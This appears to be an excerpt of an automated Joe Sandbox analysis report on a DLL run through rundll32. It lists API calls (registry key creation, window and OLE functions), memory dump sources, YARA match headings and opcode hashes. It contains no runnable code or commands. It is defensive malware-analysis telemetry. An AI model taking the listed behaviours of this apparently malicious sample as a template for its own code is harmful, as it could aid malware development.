                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ProcessorVirtual$Concurrency::RootRoot::$IconLoad_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2004563703-0
                                                                                                                      • Opcode ID: bbfc80b82c06ce06fa3432dd8c84df72dbde6e28130cc3a92eea8503f98b2c83
                                                                                                                      • Instruction ID: 36031bf0d5d502a9a7c8cde16f4ed6c3aebd0fb21a6c22909054b64381bbc268
                                                                                                                      • Opcode Fuzzy Hash: bbfc80b82c06ce06fa3432dd8c84df72dbde6e28130cc3a92eea8503f98b2c83
                                                                                                                      • Instruction Fuzzy Hash: 35216DB4D04299EBDB04CBA8C951BAEBB75FF05704F148558E4516B3C2CB79AA00C765
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 10017660
                                                                                                                      • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10017683
                                                                                                                      • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 1001769F
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 100176AF
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 100176B9
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseCreate$Open
                                                                                                                      • String ID: software
                                                                                                                      • API String ID: 1740278721-2010147023
                                                                                                                      • Opcode ID: f07ad67f425876aa3b9c3d1abad745f5130b44368e02ee1c7008248ac9000b61
                                                                                                                      • Instruction ID: 0cbbb75e8a23424455f11a5bf93a60ebfd6ed3f7897ef2d174d7de764d8d358b
                                                                                                                      • Opcode Fuzzy Hash: f07ad67f425876aa3b9c3d1abad745f5130b44368e02ee1c7008248ac9000b61
                                                                                                                      • Instruction Fuzzy Hash: E911C576900169FBDB21DB9ACD88CDFBFBCEF8A740B1040AAE504E2121D3719A55DB60
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • ~_Task_impl.LIBCPMT ref: 100011B6
                                                                                                                        • Part of subcall function 10018A6F: __EH_prolog3.LIBCMT ref: 10018A76
                                                                                                                      • ~_Task_impl.LIBCPMT ref: 100011C8
                                                                                                                      • ~_Task_impl.LIBCPMT ref: 100011EC
                                                                                                                        • Part of subcall function 10018AC4: __EH_prolog3.LIBCMT ref: 10018ACB
                                                                                                                      • ~_Task_impl.LIBCPMT ref: 100011FE
                                                                                                                      • ~_Task_impl.LIBCPMT ref: 10001210
                                                                                                                      • ~_Task_impl.LIBCPMT ref: 10001222
                                                                                                                      • ~_Task_impl.LIBCPMT ref: 10001231
                                                                                                                        • Part of subcall function 10018662: __EH_prolog3.LIBCMT ref: 10018669
                                                                                                                        • Part of subcall function 10016C14: __EH_prolog3.LIBCMT ref: 10016C1B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Task_impl$H_prolog3
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1204490572-0
                                                                                                                      • Opcode ID: 703939aafb2aac54e1cd52b349934920119c94dd7a627e6a4c3e8e8e6c663feb
                                                                                                                      • Instruction ID: d8da987412a92661894f53f4219df58ee2caf7a71088449fd518a1fce9205d0f
                                                                                                                      • Opcode Fuzzy Hash: 703939aafb2aac54e1cd52b349934920119c94dd7a627e6a4c3e8e8e6c663feb
                                                                                                                      • Instruction Fuzzy Hash: 67214770905189DBEB09DB98C960BAEBB75EF01308F18469DE0526B3C2CB392B10C716
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 10020A95
                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 10020A9F
                                                                                                                        • Part of subcall function 10033135: RaiseException.KERNEL32(?,?,?,?), ref: 10033175
                                                                                                                      • LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004), ref: 10020AB6
                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020AC3
                                                                                                                        • Part of subcall function 100201BD: __CxxThrowException@8.LIBCMT ref: 100201D1
                                                                                                                      • _memset.LIBCMT ref: 10020AE2
                                                                                                                      • TlsSetValue.KERNEL32(?,00000000), ref: 10020AF3
                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020B14
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 356813703-0
                                                                                                                      • Opcode ID: 83477c0e15d1c33d1bb5ec65c1815380ae7d3f4553bdd0be20f92f622c24e4f3
                                                                                                                      • Instruction ID: 3e12b38782b34356c97e10a87625d487b7a933956f885299f771b8ffc362d3ba
                                                                                                                      • Opcode Fuzzy Hash: 83477c0e15d1c33d1bb5ec65c1815380ae7d3f4553bdd0be20f92f622c24e4f3
                                                                                                                      • Instruction Fuzzy Hash: 7B117974100305AFE721EF60CD86D2ABBA6EF44314B51C029F8569A622DB30FC60CB50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Color$Brush
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2798902688-0
                                                                                                                      • Opcode ID: 72252987b8d251bab477bb0d0c872f96bc616149d35122bfb9b146a10746700a
                                                                                                                      • Instruction ID: b96cbce945517a62156269669ca61c0ebe7744eb3e98ebe12a1aee9bfd1db884
                                                                                                                      • Opcode Fuzzy Hash: 72252987b8d251bab477bb0d0c872f96bc616149d35122bfb9b146a10746700a
                                                                                                                      • Instruction Fuzzy Hash: 65F012719407449BD730BF728D49B47BAD5FFC4710F02092EE2418B990E6B6E040DF44
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 10029837
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 1002989C
                                                                                                                        • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 10029AAB
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 10029B1D
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 10029D0E
                                                                                                                        • Part of subcall function 1002BDB9: VariantCopy.OLEAUT32(?,?), ref: 1002BDC7
                                                                                                                        • Part of subcall function 10013820: _DebugHeapAllocator.LIBCPMTD ref: 10013875
                                                                                                                        • Part of subcall function 1002C06F: __EH_prolog3.LIBCMT ref: 1002C079
                                                                                                                        • Part of subcall function 1002C06F: lstrlenA.KERNEL32(?,00000224,10029CDA,?,00000008,00000000,?,000000CC), ref: 1002C098
                                                                                                                        • Part of subcall function 1002C06F: SysAllocStringByteLen.OLEAUT32(?,00000000), ref: 1002C0A0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$Clear$H_prolog3$AllocAllocatorByteCopyDebugException@8HeapStringThrowlstrlen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 63617653-0
                                                                                                                      • Opcode ID: 2a6cfdb99f9de51eb90a51f5ea514ffac437b21a8e7b67f1d76bd152894c2f6f
                                                                                                                      • Instruction ID: 1b2bd9fb6b1df5d5f83e0c816a53a5057bef739e6a7686bc2bbf7ce06708db6b
                                                                                                                      • Opcode Fuzzy Hash: 2a6cfdb99f9de51eb90a51f5ea514ffac437b21a8e7b67f1d76bd152894c2f6f
                                                                                                                      • Instruction Fuzzy Hash: 06F16D7890024CEBDF55DFA0E890AFD7BB9EF08384F90405AFC5593191DB74AA88DB61
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_catch_GS.LIBCMT ref: 1002D1F0
                                                                                                                      • lstrlenA.KERNEL32(00000000,000000FF,00000050,10022221,00000000,00000001,?,?,000000FF,?,?,?), ref: 1002D222
                                                                                                                        • Part of subcall function 10017790: _memcpy_s.LIBCMT ref: 100177A0
                                                                                                                      • _memset.LIBCMT ref: 1002D2F2
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 1002D3D1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ClearH_prolog3_catch_Variant_memcpy_s_memsetlstrlen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4021759052-0
                                                                                                                      • Opcode ID: dc537336900b1f9e5654c723f7bc7d689170c1efb2efdbad80408bb984cec35a
                                                                                                                      • Instruction ID: 5c01f4bcc98ccee0a604cdfa5feeb0fdece88e80b40f5b50a3c571396f452454
                                                                                                                      • Opcode Fuzzy Hash: dc537336900b1f9e5654c723f7bc7d689170c1efb2efdbad80408bb984cec35a
                                                                                                                      • Instruction Fuzzy Hash: 50A18C35C04249DBCF11EFA4E985AEEBBF0FF04350FA0415AE914AB291D734AE41DB61
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 1002D5FF
                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 1002D650
                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 1002D674
                                                                                                                        • Part of subcall function 100200B9: __EH_prolog3.LIBCMT ref: 100200C0
                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 1002D6CC
                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 1002D6F5
                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 1002D724
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocString$H_prolog3_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 842698744-0
                                                                                                                      • Opcode ID: 4c578374896238df2dea9fd45ffcc7e6003ce540e2fdc04b6e0d27b1621fe4e8
                                                                                                                      • Instruction ID: 1a39fa9d0276ee84c07bd3808c66cb0226ddbd666de5b2da3b26845cb98b16c2
                                                                                                                      • Opcode Fuzzy Hash: 4c578374896238df2dea9fd45ffcc7e6003ce540e2fdc04b6e0d27b1621fe4e8
                                                                                                                      • Instruction Fuzzy Hash: 2A414A34900204CFDB24EFB8D891AADB7B5EF04314F50852EF9659B2A2DB74A854CF55
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 10016936: GetParent.USER32(100010EC), ref: 10016989
                                                                                                                        • Part of subcall function 10016936: GetLastActivePopup.USER32(100010EC), ref: 10016998
                                                                                                                        • Part of subcall function 10016936: IsWindowEnabled.USER32(100010EC), ref: 100169AD
                                                                                                                        • Part of subcall function 10016936: EnableWindow.USER32(100010EC,00000000), ref: 100169C0
                                                                                                                      • EnableWindow.USER32(?,00000001), ref: 10016A2E
                                                                                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 10016A3C
                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 10016A46
                                                                                                                      • SendMessageA.USER32 ref: 10016A5B
                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 10016AD8
                                                                                                                      • EnableWindow.USER32(?,00000001), ref: 10016B14
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1877664794-0
                                                                                                                      • Opcode ID: 95381fcf6bb93498e4705e7f988ebefb44252e0409dc997f8ee4f854a67ce631
                                                                                                                      • Instruction ID: 27039e4540ef9999db1a35b9c590bf271b8d22289eaaf12d3c9627bdabeff3d4
                                                                                                                      • Opcode Fuzzy Hash: 95381fcf6bb93498e4705e7f988ebefb44252e0409dc997f8ee4f854a67ce631
                                                                                                                      • Instruction Fuzzy Hash: CE416A72A00258DBEB30CFA4CC81BDE77A8EF09350F614119E949EB281EB70D9848F52
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetWindowLongA.USER32(100010EC,000000F0), ref: 10016968
                                                                                                                      • GetParent.USER32(100010EC), ref: 10016976
                                                                                                                      • GetParent.USER32(100010EC), ref: 10016989
                                                                                                                      • GetLastActivePopup.USER32(100010EC), ref: 10016998
                                                                                                                      • IsWindowEnabled.USER32(100010EC), ref: 100169AD
                                                                                                                      • EnableWindow.USER32(100010EC,00000000), ref: 100169C0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 670545878-0
                                                                                                                      • Opcode ID: 0556ac702c88567a1be081abf13cc9cce852e4592f4cca89957eeb32636ff491
                                                                                                                      • Instruction ID: 154aafdfd528b469a8bf80fc48512ff59873e22bfc4d6b8fcadc8b05587993e6
                                                                                                                      • Opcode Fuzzy Hash: 0556ac702c88567a1be081abf13cc9cce852e4592f4cca89957eeb32636ff491
                                                                                                                      • Instruction Fuzzy Hash: D111A57260133697D661DB698E80B1BB6ECDF9EAE1F120115ED00EF254EB70DC808696
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • ClientToScreen.USER32(?,?), ref: 10020568
                                                                                                                      • GetDlgCtrlID.USER32 ref: 1002057C
                                                                                                                      • GetWindowLongA.USER32(00000000,000000F0), ref: 1002058A
                                                                                                                      • GetWindowRect.USER32 ref: 1002059C
                                                                                                                      • PtInRect.USER32(?,?,?), ref: 100205AC
                                                                                                                      • GetWindow.USER32(?,00000005), ref: 100205B9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Rect$ClientCtrlLongScreen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1315500227-0
                                                                                                                      • Opcode ID: 6e799736a4181f77db8ba904b29fc337daefc7dc264e49bf5415e2b3170b0d90
                                                                                                                      • Instruction ID: 9197e044a219b4c4c22350dcb983fe24fb7029e94376554506d026f7e511957d
                                                                                                                      • Opcode Fuzzy Hash: 6e799736a4181f77db8ba904b29fc337daefc7dc264e49bf5415e2b3170b0d90
                                                                                                                      • Instruction Fuzzy Hash: 3B01A235501739EBEB11DF549C48E9F3BADEF4A791F404011FD10D2061E730DA018B99
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: _memset
                                                                                                                      • String ID: @$@$AfxFrameOrView80s$AfxMDIFrame80s
                                                                                                                      • API String ID: 2102423945-4122032997
                                                                                                                      • Opcode ID: 34855274ca0ecd676c0cb297c8efdd531dfb4bca4f276cdc03237f3f296c8161
                                                                                                                      • Instruction ID: bbe41a20c7329c8f9bdc0efe2c46215e461a01fcfe5e7bc54fed728f21783543
                                                                                                                      • Opcode Fuzzy Hash: 34855274ca0ecd676c0cb297c8efdd531dfb4bca4f276cdc03237f3f296c8161
                                                                                                                      • Instruction Fuzzy Hash: B0816076D04219AADB40EFA4D481BDEBBF8EF04384F518566F909EB181E774DAC4CB90
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GlobalLock.KERNEL32 ref: 10021DB2
                                                                                                                      • lstrlenA.KERNEL32(?), ref: 10021DFA
                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 10021E14
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharGlobalLockMultiWidelstrlen
                                                                                                                      • String ID: System
                                                                                                                      • API String ID: 1529587224-3470857405
                                                                                                                      • Opcode ID: 4417374c3a9af998ac59b3fd5f055eb156b99ac3cd6379673959887b61f9b9dc
                                                                                                                      • Instruction ID: 76e901679f7557a4ddbab0066ed26c1097b584537e780c29b8b672eedf99bc1e
                                                                                                                      • Opcode Fuzzy Hash: 4417374c3a9af998ac59b3fd5f055eb156b99ac3cd6379673959887b61f9b9dc
                                                                                                                      • Instruction Fuzzy Hash: CC41C275D00215DFDF14CFA4DD85AEEBBB5EF14310F51822AE802DB285EB70A946CB50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 100233CB
                                                                                                                      • GetModuleHandleA.KERNEL32(?,1004B63C,00000000,?), ref: 10023496
                                                                                                                      • GetProcAddress.KERNEL32(00000000,MFCM80ReleaseManagedReferences), ref: 100234A6
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressH_prolog3_HandleModuleProc
                                                                                                                      • String ID: MFCM80ReleaseManagedReferences$mfcm80.dll
                                                                                                                      • API String ID: 2418878492-2500072749
                                                                                                                      • Opcode ID: b0e0a0a37f3552f3ecb8dafd0a082c9c0df66c75591a9635effa9e0eee7a218d
                                                                                                                      • Instruction ID: 416d3485c59068a364c2a46f33bf17d30033b20eabc5154db7a9307924c289c3
                                                                                                                      • Opcode Fuzzy Hash: b0e0a0a37f3552f3ecb8dafd0a082c9c0df66c75591a9635effa9e0eee7a218d
                                                                                                                      • Instruction Fuzzy Hash: 45318F74A006449FCF06EFA0D8957AD77F9EF48300F914098E905EB292DB78EE04CB55
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetMenuCheckMarkDimensions.USER32 ref: 1001573B
                                                                                                                      • _memset.LIBCMT ref: 1001579D
                                                                                                                      • CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 100157EF
                                                                                                                      • LoadBitmapA.USER32 ref: 10015807
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4271682439-3916222277
                                                                                                                      • Opcode ID: c2f9d16966c3e05c0f00d4b6f85f81d85042d6ca8df7dc6027e25f19a9a67901
                                                                                                                      • Instruction ID: 5c54a231f9e9e48bd6b355c1aaa1100c674665813244494f34750a8ed28325e6
